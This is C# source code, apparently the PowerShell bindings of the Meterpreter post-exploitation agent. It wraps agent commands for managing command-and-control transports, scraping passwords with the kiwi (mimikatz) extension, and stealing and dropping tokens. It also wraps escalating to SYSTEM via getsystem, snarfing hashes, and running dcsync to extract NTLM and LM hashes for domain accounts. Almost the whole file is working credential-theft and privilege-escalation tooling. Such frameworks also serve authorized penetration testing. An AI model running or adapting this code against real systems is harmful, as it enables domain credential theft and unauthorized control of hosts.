        /// <summary>
        /// Asks the Meterpreter core for its transport list ("core_transport_list") and
        /// converts the response into a <see cref="SessionDefinition"/>.
        /// </summary>
        /// <returns>
        /// A session definition holding one <see cref="TransportInstance"/> per TransGroup
        /// entry of the response, or <c>null</c> when no response came back or the
        /// response's result code was non-zero.
        /// </returns>
        public static SessionDefinition List()
        {
            var raw = Core.InvokeMeterpreterBinding(true, new Tlv().ToRequest("core_transport_list"));

            if (raw == null)
            {
                System.Diagnostics.Debug.Write("[PSH BINDING] List result was null");
                return(null);
            }

            System.Diagnostics.Debug.Write("[PSH BINDING] List result returned");
            var response    = Tlv.FromResponse(raw);
            var resultCodes = response[TlvType.Result];

            if (resultCodes.Count == 0 || (int)resultCodes[0] != 0)
            {
                System.Diagnostics.Debug.Write("[PSH BINDING] List failed");
                return(null);
            }

            System.Diagnostics.Debug.Write("[PSH BINDING] List succeeded");

            // The expiry arrives as a relative number of seconds; it is stored as an absolute local time.
            var expirySeconds = Tlv.GetValue <int>(response, TlvType.TransSessExp);
            var session       = new SessionDefinition(DateTime.Now.AddSeconds(expirySeconds));

            foreach (var entry in response[TlvType.TransGroup])
            {
                session.Transports.Add(ToTransportInstance((Dictionary <TlvType, List <object> >)entry));
            }

            return(session);
        }

        // Builds a TransportInstance from a single TransGroup entry of a core_transport_list response.
        private static TransportInstance ToTransportInstance(Dictionary <TlvType, List <object> > fields)
        {
            var transport = new TransportInstance
            {
                Url         = Tlv.GetValue <string>(fields, TlvType.TransUrl, string.Empty),
                CommTimeout = Tlv.GetValue <int>(fields, TlvType.TransCommTimeout),
                RetryTotal  = Tlv.GetValue <int>(fields, TlvType.TransRetryTotal),
                RetryWait   = Tlv.GetValue <int>(fields, TlvType.TransRetryWait),
                UserAgent   = Tlv.GetValue <string>(fields, TlvType.TransUa, string.Empty),
                ProxyHost   = Tlv.GetValue <string>(fields, TlvType.TransProxyHost, string.Empty),
                ProxyUser   = Tlv.GetValue <string>(fields, TlvType.TransProxyUser, string.Empty),
                ProxyPass   = Tlv.GetValue <string>(fields, TlvType.TransProxyPass, string.Empty),
            };

            // The certificate hash is optional. When present it is exposed as upper-case hex
            // without separators (BitConverter emits "AA-BB-..."; the dashes are stripped).
            var certHash = Tlv.GetValue <byte[]>(fields, TlvType.TransCertHash);
            if (certHash != null && certHash.Length > 0)
            {
                transport.CertHash = BitConverter.ToString(certHash).Replace("-", "");
            }

            return transport;
        }
        /// <summary>
        /// Invokes the kiwi extension's "kiwi_scrape_passwords" command and returns the
        /// credentials it reports, collapsing entries whose <c>ToString()</c> is identical.
        /// </summary>
        /// <returns>The distinct credentials found in the response.</returns>
        /// <exception cref="InvalidOperationException">
        /// The current session is not running as SYSTEM, or no successful response came back
        /// (treated as the kiwi extension not being loaded).
        /// </exception>
        public static List <Credential> CredsAll()
        {
            System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call CredsAll");

            // Fail fast: the call is only attempted from a SYSTEM context.
            if (!User.IsSystem())
            {
                throw new InvalidOperationException("Current session is not running as SYSTEM");
            }

            Tlv request = new Tlv();
            request.Pack(TlvType.KiwiPwdId, 0);

            var raw = Core.InvokeMeterpreterBinding(true, request.ToRequest("kiwi_scrape_passwords"));

            if (raw != null)
            {
                System.Diagnostics.Debug.Write("[PSH BINDING] Result returned, kiwi is probably loaded");
                var response    = Tlv.FromResponse(raw);
                var resultCodes = response[TlvType.Result];

                if (resultCodes.Count > 0 && (int)resultCodes[0] == 0)
                {
                    // Keyed on the credential's string form so repeated entries are reported once;
                    // the first occurrence of a key is the one kept.
                    var unique = new Dictionary <string, Credential>();

                    foreach (var entry in response[TlvType.KiwiPwdResult])
                    {
                        var fields     = (Dictionary <TlvType, List <object> >)entry;
                        var credential = new Credential
                        {
                            Domain   = Tlv.GetValue <string>(fields, TlvType.KiwiPwdDomain, string.Empty),
                            Username = Tlv.GetValue <string>(fields, TlvType.KiwiPwdUserName, string.Empty),
                            Password = Tlv.GetValue <string>(fields, TlvType.KiwiPwdPassword, string.Empty)
                        };

                        var key = credential.ToString();
                        if (!unique.ContainsKey(key))
                        {
                            unique.Add(key, credential);
                        }
                    }

                    return(new List <Credential>(unique.Values));
                }
            }

            System.Diagnostics.Debug.Write("[PSH BINDING] Result not returned, kiwi is probably not loaded");
            throw new InvalidOperationException("Kiwi extension is not loaded");
        }
        /// <summary>
        /// Sends the stdapi rev2self command and reports whether the agent acknowledged it.
        /// </summary>
        /// <returns>
        /// <c>true</c> when a response with a zero result code came back; <c>false</c> when
        /// there was no response or the result code was non-zero.
        /// </returns>
        public static bool Rev2Self()
        {
            System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call Rev2Self");

            // Unlike the neighbouring bindings, this one addresses the command through its
            // CommandId rather than by its string name.
            var raw = Core.InvokeMeterpreterBinding(true, new Tlv().ToRequest(CommandId.StdapiSysConfigRev2self));

            if (raw == null)
            {
                return(false);
            }

            var resultCodes = Tlv.FromResponse(raw)[TlvType.Result];
            return(resultCodes.Count > 0 && (int)resultCodes[0] == 0);
        }
        /// <summary>
        /// Sends the "stdapi_sys_config_drop_token" command and reports whether the agent acknowledged it.
        /// </summary>
        /// <returns>
        /// <c>true</c> when a response with a zero result code came back; <c>false</c> when
        /// there was no response or the result code was non-zero.
        /// </returns>
        public static bool DropToken()
        {
            System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call DropToken");

            var raw = Core.InvokeMeterpreterBinding(true, new Tlv().ToRequest("stdapi_sys_config_drop_token"));

            if (raw == null)
            {
                return(false);
            }

            var resultCodes = Tlv.FromResponse(raw)[TlvType.Result];
            return(resultCodes.Count > 0 && (int)resultCodes[0] == 0);
        }
        /// <summary>
        /// Sends the "stdapi_sys_config_steal_token" command for the given process id and
        /// reports whether the agent acknowledged it.
        /// </summary>
        /// <param name="pid">Process id packed into the request as <see cref="TlvType.Pid"/>; not validated here.</param>
        /// <returns>
        /// <c>true</c> when a response with a zero result code came back; <c>false</c> when
        /// there was no response or the result code was non-zero.
        /// </returns>
        public static bool StealToken(int pid)
        {
            System.Diagnostics.Debug.Write(string.Format("[PSH BINDING] Invoking binding call StealToken({0})", pid));

            Tlv request = new Tlv();
            request.Pack(TlvType.Pid, pid);

            var raw = Core.InvokeMeterpreterBinding(true, request.ToRequest("stdapi_sys_config_steal_token"));

            if (raw == null)
            {
                return(false);
            }

            var resultCodes = Tlv.FromResponse(raw)[TlvType.Result];
            return(resultCodes.Count > 0 && (int)resultCodes[0] == 0);
        }
        /// <summary>
        /// Requests the remote process table ("stdapi_sys_process_get_processes") and maps
        /// each ProcessGroup entry of the response to a <see cref="ProcessInfo"/>.
        /// </summary>
        /// <returns>
        /// The list of processes, or <c>null</c> when there was no response or the
        /// response's result code was non-zero.
        /// </returns>
        public static List <ProcessInfo> ProcessList()
        {
            var raw = Core.InvokeMeterpreterBinding(true, new Tlv().ToRequest("stdapi_sys_process_get_processes"));

            if (raw == null)
            {
                System.Diagnostics.Debug.Write("[PSH BINDING] ProcessList result was null");
                return(null);
            }

            System.Diagnostics.Debug.Write("[PSH BINDING] ProcessList result returned");
            var response    = Tlv.FromResponse(raw);
            var resultCodes = response[TlvType.Result];

            if (resultCodes.Count == 0 || (int)resultCodes[0] != 0)
            {
                System.Diagnostics.Debug.Write("[PSH BINDING] ProcessList failed");
                return(null);
            }

            System.Diagnostics.Debug.Write("[PSH BINDING] ProcessList succeeded");
            var processes = new List <ProcessInfo>();

            foreach (var entry in response[TlvType.ProcessGroup])
            {
                var fields = (Dictionary <TlvType, List <object> >)entry;

                // The architecture is a numeric code: 1 is labelled x86 and every other value
                // (including whatever GetValue yields for an absent field) is labelled x86_64.
                var architecture = Tlv.GetValue <int>(fields, TlvType.ProcessArch) == 1 ? "x86" : "x86_64";

                processes.Add(new ProcessInfo
                {
                    Architecture = architecture,
                    Name         = Tlv.GetValue <string>(fields, TlvType.ProcessName, string.Empty),
                    Username     = Tlv.GetValue <string>(fields, TlvType.UserName, string.Empty),
                    Pid          = Tlv.GetValue <int>(fields, TlvType.Pid),
                    ParentPid    = Tlv.GetValue <int>(fields, TlvType.ParentPid),
                    Path         = Tlv.GetValue <string>(fields, TlvType.ProcessPath, string.Empty),
                    Session      = Tlv.GetValue <int>(fields, TlvType.ProcessSession)
                });
            }

            return(processes);
        }
        /// <summary>
        /// Requests the remote mount table ("stdapi_fs_mount_show") and maps each Mount entry
        /// of the response to a <see cref="Mount"/>.
        /// </summary>
        /// <returns>
        /// The list of mounts, or <c>null</c> when there was no response or the response's
        /// result code was non-zero.
        /// </returns>
        public static List <Mount> ShowMount()
        {
            var raw = Core.InvokeMeterpreterBinding(true, new Tlv().ToRequest("stdapi_fs_mount_show"));

            if (raw == null)
            {
                System.Diagnostics.Debug.Write("[PSH BINDING] ShowMount result was null");
                return(null);
            }

            System.Diagnostics.Debug.Write("[PSH BINDING] ShowMount result returned");
            var response    = Tlv.FromResponse(raw);
            var resultCodes = response[TlvType.Result];

            if (resultCodes.Count == 0 || (int)resultCodes[0] != 0)
            {
                System.Diagnostics.Debug.Write("[PSH BINDING] ShowMount failed");
                return(null);
            }

            System.Diagnostics.Debug.Write("[PSH BINDING] ShowMount succeeded");
            var mounts = new List <Mount>();

            foreach (var entry in response[TlvType.Mount])
            {
                var fields = (Dictionary <TlvType, List <object> >)entry;

                // Space figures are 64-bit; the mount type falls back to Unknown when absent.
                mounts.Add(new Mount
                {
                    Name       = Tlv.GetValue <string>(fields, TlvType.MountName, string.Empty),
                    Type       = Tlv.GetValue <MountType>(fields, TlvType.MountType, MountType.Unknown),
                    SpaceUser  = Tlv.GetValue <long>(fields, TlvType.MountSpaceUser),
                    SpaceTotal = Tlv.GetValue <long>(fields, TlvType.MountSpaceTotal),
                    SpaceFree  = Tlv.GetValue <long>(fields, TlvType.MountSpaceFree),
                    UncPath    = Tlv.GetValue <string>(fields, TlvType.MountUncPath, string.Empty)
                });
            }

            return(mounts);
        }
        /// <summary>
        /// Sends the "priv_elevate_getsystem" command with a fixed technique selector and
        /// service name and reports whether the agent acknowledged it.
        /// </summary>
        /// <returns>
        /// <c>true</c> when a response with a zero result code came back; <c>false</c> when
        /// there was no response or the result code was non-zero.
        /// </returns>
        public static bool GetSystem()
        {
            System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call GetSystem");

            // Both values are constants: technique 1 and the literal service name "abcd1234".
            // A fixed service name is an easily fingerprinted artifact of this binding.
            Tlv request = new Tlv();
            request.Pack(TlvType.ElevateTechnique, 1);
            request.Pack(TlvType.ElevateServiceName, "abcd1234");

            var raw = Core.InvokeMeterpreterBinding(true, request.ToRequest("priv_elevate_getsystem"));

            if (raw == null)
            {
                return(false);
            }

            var resultCodes = Tlv.FromResponse(raw)[TlvType.Result];
            return(resultCodes.Count > 0 && (int)resultCodes[0] == 0);
        }
        /// <summary>
        /// Sends the "incognito_snarf_hashes" command and reports whether the agent acknowledged it.
        /// </summary>
        /// <returns><c>true</c> when the response carries a zero result code; otherwise <c>false</c>.</returns>
        /// <exception cref="InvalidOperationException">
        /// No response came back at all (treated as the incognito extension not being loaded).
        /// </exception>
        public static bool SnarfHashes()
        {
            System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call SnarfHashes");

            var raw = Core.InvokeMeterpreterBinding(true, new Tlv().ToRequest("incognito_snarf_hashes"));

            if (raw == null)
            {
                // Note the asymmetry with the other bool bindings here: a missing response throws rather than returning false.
                System.Diagnostics.Debug.Write("[PSH BINDING] Result not returned, incognito is probably not loaded");
                throw new InvalidOperationException("incognito extension is not loaded");
            }

            System.Diagnostics.Debug.Write("[PSH BINDING] Result returned, incognito is probably loaded");
            var resultCodes = Tlv.FromResponse(raw)[TlvType.Result];
            return(resultCodes.Count > 0 && (int)resultCodes[0] == 0);
        }
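        /// <summary>
        /// Registers a new transport with the Meterpreter core ("core_transport_add").
        /// </summary>
        /// <param name="transport">
        /// Transport settings to send. <c>Url</c> is always packed; the remaining fields are
        /// packed only when set (positive numbers, non-empty strings).
        /// </param>
        /// <param name="sessionExpiry">Session expiry in seconds; packed only when positive.</param>
        /// <returns>
        /// <c>true</c> when a response with a zero result code came back; <c>false</c> when
        /// there was no response or the result code was non-zero.
        /// </returns>
        /// <exception cref="ArgumentNullException"><paramref name="transport"/> is null.</exception>
        /// <exception cref="ArgumentException"><c>CertHash</c> has an odd number of characters.</exception>
        /// <exception cref="FormatException"><c>CertHash</c> contains non-hexadecimal characters.</exception>
        public static bool Add(TransportInstance transport, int sessionExpiry = 0)
        {
            if (transport == null)
            {
                throw new ArgumentNullException("transport");
            }

            Tlv tlv = new Tlv();

            tlv.Pack(TlvType.TransUrl, transport.Url);

            if (sessionExpiry > 0)
            {
                tlv.Pack(TlvType.TransSessExp, sessionExpiry);
            }
            if (transport.CommTimeout > 0)
            {
                tlv.Pack(TlvType.TransCommTimeout, transport.CommTimeout);
            }
            if (transport.RetryTotal > 0)
            {
                tlv.Pack(TlvType.TransRetryTotal, transport.RetryTotal);
            }
            if (transport.RetryWait > 0)
            {
                tlv.Pack(TlvType.TransRetryWait, transport.RetryWait);
            }
            if (!string.IsNullOrEmpty(transport.UserAgent))
            {
                tlv.Pack(TlvType.TransUa, transport.UserAgent);
            }
            // The proxy fields have their own TLV types (the same ones List() reads them back
            // from); packing them as TransUa would overwrite/duplicate the user agent instead.
            if (!string.IsNullOrEmpty(transport.ProxyHost))
            {
                tlv.Pack(TlvType.TransProxyHost, transport.ProxyHost);
            }
            if (!string.IsNullOrEmpty(transport.ProxyUser))
            {
                tlv.Pack(TlvType.TransProxyUser, transport.ProxyUser);
            }
            if (!string.IsNullOrEmpty(transport.ProxyPass))
            {
                tlv.Pack(TlvType.TransProxyPass, transport.ProxyPass);
            }
            if (!string.IsNullOrEmpty(transport.CertHash))
            {
                tlv.Pack(TlvType.TransCertHash, CertHashToBytes(transport.CertHash));
            }

            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("core_transport_add"));

            if (result == null)
            {
                System.Diagnostics.Debug.Write("[PSH BINDING] Add result was null");
                return(false);
            }

            System.Diagnostics.Debug.Write("[PSH BINDING] Add result returned");
            var resultCodes = Tlv.FromResponse(result)[TlvType.Result];
            return(resultCodes.Count > 0 && (int)resultCodes[0] == 0);
        }

        // Converts the separator-free hex form of a certificate hash (the form List() produces)
        // back into raw bytes. An odd-length string is rejected up front: the previous
        // length / 2 arithmetic silently dropped the trailing nibble, which would send a
        // truncated pin to the agent. Non-hex characters surface as FormatException from
        // Convert.ToByte, as before.
        private static byte[] CertHashToBytes(string certHash)
        {
            if (certHash.Length % 2 != 0)
            {
                throw new ArgumentException("CertHash must contain an even number of hexadecimal digits.", "certHash");
            }

            var bytes = new byte[certHash.Length / 2];
            for (var i = 0; i < bytes.Length; ++i)
            {
                bytes[i] = Convert.ToByte(certHash.Substring(i * 2, 2), 16);
            }
            return bytes;
        }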
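        /// <summary>
        /// Runs "lsadump::dcsync" through the kiwi extension ("kiwi_exec_cmd") for one account
        /// and extracts the NTLM hash, LM hash, SID and RID from the command's textual output.
        /// </summary>
        /// <param name="username">Account in the form 'DOMAIN\username'.</param>
        /// <param name="domainController">Optional; appended to the command as "/dc:".</param>
        /// <param name="domainFQDN">Optional; appended to the command as "/domain:".</param>
        /// <returns>
        /// A <see cref="SyncRecord"/> whose <c>Account</c> is <paramref name="username"/>;
        /// fields whose marker line did not appear in the output are left at their defaults.
        /// </returns>
        /// <exception cref="InvalidOperationException">
        /// The session is running as SYSTEM, or no successful, non-empty kiwi result came back.
        /// </exception>
        /// <exception cref="ArgumentException">
        /// <paramref name="username"/> is empty or lacks a backslash, or any argument contains
        /// a double quote.
        /// </exception>
        public static SyncRecord DcSync(string username, string domainController = null, string domainFQDN = null)
        {
            if (User.IsSystem())
            {
                throw new InvalidOperationException("Current session is running as SYSTEM, dcsync won't work.");
            }

            System.Diagnostics.Debug.Write("[PSH BINDING - DCSYNC] User is not running as SYSTEM.");

            if (string.IsNullOrEmpty(username) || !username.Contains("\\"))
            {
                throw new ArgumentException("Username must be specified in the format 'DOMAIN\\username'.");
            }

            // All three values are spliced into a double-quoted command string below. An
            // embedded quote would end that string early and let the remainder be parsed as
            // additional command tokens, so such values are refused instead of forwarded.
            RejectEmbeddedQuote(username, "username");
            RejectEmbeddedQuote(domainController, "domainController");
            RejectEmbeddedQuote(domainFQDN, "domainFQDN");

            var command = string.Format("lsadump::dcsync /user:{0}", username);

            if (!string.IsNullOrEmpty(domainController))
            {
                command = string.Format("{0} /dc:{1}", command, domainController);
            }

            if (!string.IsNullOrEmpty(domainFQDN))
            {
                command = string.Format("{0} /domain:{1}", command, domainFQDN);
            }

            // Mustn't forget to wrap this in a string so it's considered a single command
            command = string.Format("\"{0}\"", command);
            System.Diagnostics.Debug.Write("[PSH BINDING - DCSYNC] Command execution will contain: " + command);

            Tlv tlv = new Tlv();
            tlv.Pack(TlvType.KiwiCmd, command);

            System.Diagnostics.Debug.Write("[PSH BINDING - DCSYNC] Invoking kiwi_exec_cmd");
            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("kiwi_exec_cmd"));

            System.Diagnostics.Debug.Write("[PSH BINDING - DCSYNC] Invoked kiwi_exec_cmd");
            if (result != null)
            {
                System.Diagnostics.Debug.Write("[PSH BINDING] Result returned, kiwi is probably loaded");
                var responseTlv = Tlv.FromResponse(result);

                System.Diagnostics.Debug.Write(string.Format("[PSH BINDING] DcSync response came back with {0} results", responseTlv.Count));
                System.Diagnostics.Debug.Write(string.Format("[PSH BINDING] DcSync response should contain a value for {0} {1}", TlvType.KiwiCmdResult, (int)TlvType.KiwiCmdResult));
                foreach (var k in responseTlv.Keys)
                {
                    System.Diagnostics.Debug.Write(string.Format("[PSH BINDING] DcSync response contains key: {0} ({1})", k, (int)k));
                }

                if (responseTlv[TlvType.Result].Count > 0 &&
                    (int)responseTlv[TlvType.Result][0] == 0 &&
                    responseTlv[TlvType.KiwiCmdResult].Count > 0 &&
                    responseTlv[TlvType.KiwiCmdResult][0].ToString().Length > 0)
                {
                    System.Diagnostics.Debug.Write("[PSH BINDING] DcSync returned with some data");
                    return(ParseDcSyncOutput(username, responseTlv[TlvType.KiwiCmdResult][0].ToString()));
                }
            }

            System.Diagnostics.Debug.Write("[PSH BINDING] No result returned, kiwi is probably not loaded");
            throw new InvalidOperationException("Kiwi extension not loaded.");
        }

        // Rejects a value destined for the quoted kiwi command if it contains a double quote.
        // Null/empty values are allowed through (the optional parameters are skipped when empty).
        private static void RejectEmbeddedQuote(string value, string paramName)
        {
            if (!string.IsNullOrEmpty(value) && value.IndexOf('"') >= 0)
            {
                throw new ArgumentException("Value must not contain a double quote character.", paramName);
            }
        }

        // Picks the four fields this binding reports out of dcsync's line-oriented output.
        // Each field is the last space-separated token of the line that announces it; the
        // scan stops as soon as all four have been seen. The marker labels are fixed tool
        // output, so matching is ordinal rather than culture-sensitive.
        private static SyncRecord ParseDcSyncOutput(string account, string output)
        {
            var record = new SyncRecord
            {
                Account = account
            };
            var elementsFound = 0;

            foreach (var line in output.Split('\n'))
            {
                var stripped = line.Trim();
                if (stripped.StartsWith("Hash NTLM: ", StringComparison.Ordinal))
                {
                    record.NtlmHash = LastToken(stripped);
                    elementsFound++;
                }
                else if (stripped.StartsWith("lm  - 0: ", StringComparison.Ordinal))
                {
                    record.LmHash = LastToken(stripped);
                    elementsFound++;
                }
                else if (stripped.StartsWith("Object Security ID", StringComparison.Ordinal))
                {
                    record.SID = LastToken(stripped);
                    elementsFound++;
                }
                else if (stripped.StartsWith("Object Relative ID", StringComparison.Ordinal))
                {
                    record.RID = LastToken(stripped);
                    elementsFound++;
                }

                if (elementsFound > 3)
                {
                    break;
                }
            }

            return record;
        }

        // Last token of a line split on single spaces (the caller has already trimmed it).
        private static string LastToken(string line)
        {
            var parts = line.Split(' ');
            return parts[parts.Length - 1];
        }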